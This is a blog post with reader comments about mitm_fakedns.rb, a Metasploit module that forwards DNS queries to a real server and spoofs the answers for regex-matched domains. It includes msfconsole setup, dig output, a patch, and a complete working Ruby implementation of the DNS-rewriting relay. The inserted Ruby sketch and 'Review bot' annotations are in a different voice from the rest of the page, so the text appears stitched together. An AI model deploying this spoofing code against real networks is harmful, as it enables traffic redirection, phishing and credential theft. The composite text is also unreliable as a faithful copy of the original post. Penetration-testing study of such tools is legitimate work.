Man-in-the-middle Fake DNS for Metasploit
On Episode 116 of PaulDotCom Security Weekly, Paul mentioned how it would be nice if one could have a little bit finer control over the behavior of Metasploit’s fake DNS server. It seemed like an easy enough hack, so I’ve thrown this together. I can see this being useful in some situations, and hopefully you will too.
Metasploit’s fakedns.rb is good at what it does, which is respond to any DNS query with a spoofed response pointing at a specific IP address. This module, which I’ve decided to name “mitm_fakedns.rb”, is a dirty, filthy hack of fakedns.rb. It’s not nearly as polished and thought-out as the web_search_scan.rb module I wrote and posted about a couple of days ago, but it is kinda neat anyway.
It listens for DNS, and when it gets a request it passes it on to a real DNS server that you specify. Once it gets the response from that real server, it modifies the response to point at the IP address you specify, if the name matches one of a set of regexes you provide. This lets you be a little more “surgical” with whatever attack you have planned, by only spoofing the domain names of interest.
Let’s have a look at the “show info”:
HacBook:framework wesley$ sudo ./msfconsole
Password:
(msfconsole ASCII-art banner)
=[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 68 aux
msf > use auxiliary/server/mitm_fakedns
msf auxiliary(mitm_fakedns) > info
Name: MITM DNS Service
Version: 5540
Provided by:
unknown <ddz>
hdm <hdm@metasploit.com>
Wesley McGrew <wesley@mcgrewsecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME yes File of ip,regex for filtering responses
REALDNS yes Ask this server for answers
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 53 yes The local port to listen on.
Description:
This hack of the metasploit fakedns.rb serves as a sort of MITM DNS
server. Requests are passed through to a real DNS server, and the
responses are modified before being returned to the client, if they
match regular expressions set in FILENAME.
Once it's loaded, we can set our variables:
msf auxiliary(mitm_fakedns) > cat /Users/wesley/hosts.txt
[*] exec: cat /Users/wesley/hosts.txt
192.168.1.1,google.com
10.0.0.1,example.com
msf auxiliary(mitm_fakedns) > set FILENAME /Users/wesley/hosts.txt
FILENAME => /Users/wesley/hosts.txt
msf auxiliary(mitm_fakedns) > set REALDNS 192.168.1.254
REALDNS => 192.168.1.254
msf auxiliary(mitm_fakedns) > run
[*] Auxiliary module running as background job
msf auxiliary(mitm_fakedns) >
The file you specify should have an IP address and a regular expression, one pair per line. Once it’s running, you can test it out by pointing “dig” at it:
HacBook:~ wesley$ dig @127.0.0.1 example.com

; <<>> DiG 9.4.1-P1 <<>> @127.0.0.1 example.com
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38312
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;example.com. IN A

;; ANSWER SECTION:
example.com. 99270 IN A 10.0.0.1

;; Query time: 39 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Mon Aug 4 22:59:01 2008
;; MSG SIZE rcvd: 45
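To make the rewrite step concrete, here is an added, stand-alone Ruby sketch of the same idea, written for this page rather than taken from mitm_fakedns.rb or from Metasploit. It uses only Ruby's stdlib resolv library: parse_filter reads the "ip,regex" file format described above (skipping blank and trailing lines, the case that produced the "can't convert nil into String" error discussed in the comments), rewrite_response takes a real server's reply off the wire and repoints its IN A answers when the queried name matches a rule, and relay_query shows the UDP forwarding to the REALDNS server. All function names, the 192.0.2.x addresses and the sample filter text are constructed for the example; build_response fabricates an upstream reply so the code runs with no network.

```ruby
require 'resolv'
require 'socket'

# Parse the FILENAME format from the post: "ip,regex", one pair per line.
# Blank lines (including a trailing newline) are skipped instead of yielding
# a nil pattern, which is the failure mode reported in the comments.
def parse_filter(text)
  rules = []
  text.each_line.with_index(1) do |raw, lineno|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    ip, pattern = line.split(',', 2)
    if pattern.nil? || pattern.strip.empty? || ip.strip.empty?
      raise ArgumentError, "filter line #{lineno}: expected 'ip,regex', got #{raw.inspect}"
    end
    rules << [ip.strip, Regexp.new(pattern.strip, Regexp::IGNORECASE)]
  end
  rules
end

# First rule whose regex matches the queried name wins; nil means "pass through".
def spoof_target(rules, qname)
  rules.each { |ip, re| return ip if re.match?(qname) }
  nil
end

# Take an upstream DNS response on the wire; if the question name matches a
# rule, point every IN A answer at the rule's IP. Everything else (id, flags,
# question, TTLs, non-A records) stays exactly as the real server sent it.
# Returns [rewritten_wire, number_of_records_changed].
def rewrite_response(rules, wire)
  msg = Resolv::DNS::Message.decode(wire)
  qname = msg.question.map { |name, _type| name.to_s }.first
  target = qname && spoof_target(rules, qname)
  return [wire, 0] unless target

  changed = 0
  msg.answer.each do |entry|            # each entry is [name, ttl, resource]
    next unless entry[2].is_a?(Resolv::DNS::Resource::IN::A)
    entry[2] = Resolv::DNS::Resource::IN::A.new(target)
    changed += 1
  end
  [msg.encode, changed]
end

# Build a plausible upstream reply for offline testing (constructed data).
def build_response(id, qname, ttl, ip)
  msg = Resolv::DNS::Message.new(id)
  msg.qr = 1           # this is a response
  msg.rd = 1
  msg.ra = 1           # recursion available, like "flags: qr ra" in the dig output
  msg.add_question(qname, Resolv::DNS::Resource::IN::A)
  msg.add_answer(qname, ttl, Resolv::DNS::Resource::IN::A.new(ip))
  msg.encode
end

# The forwarding step the module performs: relay the client's raw query to the
# REALDNS server over UDP, rewrite the reply, hand it back. Needs a network, so
# it is not exercised by the offline run below.
def relay_query(rules, query_wire, upstream, port = 53, timeout = 3)
  sock = UDPSocket.new
  sock.send(query_wire, 0, upstream, port)
  raise "no reply from #{upstream}" unless IO.select([sock], nil, nil, timeout)
  reply, _from = sock.recvfrom(4096)
  rewrite_response(rules, reply)
ensure
  sock&.close
end

# Constructed sample matching the post's hosts.txt, with a trailing blank line.
SAMPLE_FILTER = "192.168.1.1,google.com\n10.0.0.1,example.com\n\n"

if __FILE__ == $PROGRAM_NAME
  rules = parse_filter(SAMPLE_FILTER)
  upstream = build_response(38312, 'example.com', 99270, '192.0.2.10')
  spoofed, n = rewrite_response(rules, upstream)
  Resolv::DNS::Message.decode(spoofed).each_answer do |name, ttl, rr|
    puts "#{name} #{ttl} IN A #{rr.address}  (#{n} record(s) rewritten)"
  end
end
```

Matching is done on the question name rather than on each answer's owner name, so a reply that goes through a CNAME chain still gets its final A records rewritten; the unanchored regex semantics (a dot matching any character) are the same as in the filter file the post describes.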
This should serve as a pretty good drop-in replacement for fakedns.rb for some attacks. Here’s the source:
Thanks a lot man, I really like to use Karma/sploit when performing wireless pentesting and have always been frustrated by the fakedns part. Unfortunately my ruby knowledge is so miserable I have never been able to rewrite something really stable, so I HIGHLY appreciate your version.
Thanks again,
hello,
Just a small question about your script: while testing it with your above syntax, I get a ruby error: Auxiliary module failed; can’t convert nil into String
Does it seem familiar to you (or any idea how to solve this)? I’m using ubuntu hardy with ruby 1.8.6 patch level 111
Thanks a lot in advance
Ulrick:
Check your filter text file for trailing newlines.
-eg
Thanks egus! I was wracking my brain over that one.
Thanks guys,
It works now, never thought to look in the hosts file as i did a copy paste of yours.
Worse, when trying on msf for a windows platform, it was working fine, and i was therefore scratching my head on the source code and my linux installation.
Everything is working fine nice and will be able to make better demonstrations during the next penetration tests.
;-)
Hey,
Issue resolved.
Excuse me for passing on all the info.
http://www.astalavista.com/index.php?section=blog&cmd=details&id=3689
Thanks USB.
Just a note, the mitm_fakedns plugin no longer works with recent versions of the Metasploit 3 testing branch, (trunk).
A major rewrite of the underlying ruby code is underway which seems to break some things. (like class declarations).
Here is my patch of mitm_fakedns to allow it to run within the new framework. (tested with Rev 5845).
—————————————————-
— mitm_fakedns.rb.ORIG 2008-11-05 11:07:12.000000000 -0600
+++ mitm_fakedns.rb 2008-11-05 17:36:44.000000000 -0600
@@ -13,9 +13,9 @@
require ‘msf/core’
require ‘resolv’
-module Msf
-class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
+
+class Metasploit3 < Msf::Auxiliary
include Auxiliary::Report
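Review bot: the `include Auxiliary::Report` context line stays unqualified while the superclass on the new `+class Metasploit3 < Msf::Auxiliary` line is fully qualified; with the enclosing `module Msf` removed, `Auxiliary::Report` is no longer lexically inside `Msf`, so whether it resolves depends on how the framework evaluates the file. Writing `include Msf::Auxiliary::Report` removes that dependency. Note also that this hunk only works together with the one at line 165: the `end` removed there is the one that closed the `module Msf` deleted here.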
@@ -165,4 +165,4 @@
end
end
-end
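Review bot: the `-end` removed here is the close of the `module Msf` deleted in the first hunk, so the two hunks must be applied as a pair; applying only the class rename leaves an unmatched `end` at the bottom of the file, which is exactly the `unexpected kEND, expecting $end` compile error reported in a later comment. The header `@@ -165,4 +165,4 @@` also announces four lines on both sides while three old lines and two new lines are shown, so some context (probably a blank line) was lost when the patch was pasted; apply this change by hand rather than feeding the pasted text to patch(1).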
————————————————–
Regards,
-egus
Thanks for taking the time to fix it and post egus! I’ll make the change and upload it once I get a chance :)
Does anyone have an idea what the problem is here?
/root/framework-3.2/modules/auxiliary/server/mitm_fakedns.rb: SyntaxError (eval):166:in `load_module_from_file': compile error
(eval):166: syntax error, unexpected kEND, expecting $end